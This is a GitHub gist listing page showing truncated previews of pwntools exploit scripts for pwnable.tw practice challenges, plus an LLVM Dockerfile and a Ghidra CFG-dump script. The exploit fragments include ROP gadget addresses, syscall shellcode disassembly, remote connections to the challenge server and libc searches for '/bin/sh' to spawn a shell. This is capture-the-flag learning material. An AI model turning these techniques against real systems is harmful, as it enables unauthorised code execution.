Skip to content

Instantly share code, notes, and snippets.

@bin2415
bin2415 / attack_calc.py
Last active May 15, 2018 01:38
pwnable.tw calc
from pwn import *
from struct import pack
#/bin/sh/ = 0x6e69622f,0x0068732f
addr1 = 0x8070880 # int 80; ret
addr2 = 0x807cb7f # inc eax; ret
addr3 = 0x80908d0 # mov eax, 7;ret
addr4 = 0x80701aa # pop edx; ret
addr5 = 0x80701d1 # pop ecx; pop ebx; ret
@bin2415
bin2415 / attack_orw.py
Created May 14, 2018 06:59
pwnable.tw orw
from pwn import *
'''
e: b8 05 00 00 00 mov $0x5,%eax
13: bb 9f a0 04 08 mov addr(shellcode+0x39),%ebx
18: b9 9a 02 00 00 mov $0x29a,%ecx
1d: ba 00 00 00 00 mov $0x0,%edx
22: cd 80 int $0x80
24: 89 c3 mov %eax,%ebx
27: b8 03 00 00 00 mov $0x3,%eax
@bin2415
bin2415 / attack_hacknote.py
Last active June 24, 2018 06:30
pwnable.tw hacknote
from pwn import *
#p = process('./hacknote', env={"LD_PRELOAD" : "./libc_32.so.6"})
p = remote('chall.pwnable.tw', 10102)
libc = ELF('./libc_32.so.6')
binsh_addr = 0
for address in libc.search('/bin/sh\x00'):
print("/bin/sh address is " + str(hex(address)))
binsh_addr = address
@bin2415
bin2415 / attack_dubblesort.py
Created June 22, 2018 08:37
pwnable.tw dubblesort
from pwn import *
libc = ELF('./libc.so.6')
binsh_addr = 0
for address in libc.search('/bin/sh\x00'):
print(address)
binsh_addr = address
break
@bin2415
bin2415 / attack_silver_bullet.py
Created June 30, 2018 06:27
pwnable.tw attack silver
from pwn import *
silver_bullet = ELF('./silver_bullet')
libc = ELF('./libc_32.so.6')
#p = process('silver_bullet', env={'LD_PRELOAD' : './libc_32.so.6'})
p = remote('chall.pwnable.tw', 10103)
p.recvuntil('Your choice :')
p.sendline('1')
@bin2415
bin2415 / attack_applestore.py
Created July 1, 2018 08:45
pwnable.tw applestore
from pwn import *
'''
control ebp to control the stack, so can modify atoi got
这道题的关键还是通过控制ebp来控制对atoi的got表项进行修改
'''
def addDevice(device_num):
p.recvuntil('>')
@bin2415
bin2415 / Dockerfile
Last active January 29, 2021 02:45
LLVM Docker
FROM ubuntu:18.04
# Install dependencies
RUN apt-get -y update; \
apt-get install -y --no-install-recommends \
ca-certificates build-essential \
autoconf automake cmake dpkg-dev file git make patch \
libc-dev libc++-dev libgcc-8-dev libstdc++-8-dev python python-dev \
dirmngr gnupg2 lbzip2 wget xz-utils libtinfo5;
@bin2415
bin2415 / ghidraCFG.py
Last active November 30, 2024 09:49
Python script of Ghidra to dump cfg
#TODO write a description for this script
#@author Chengbin, MyriaCore
#@category Functions
#@keybinding
#@menupath
#@toolbar
#TODO Add User Code Here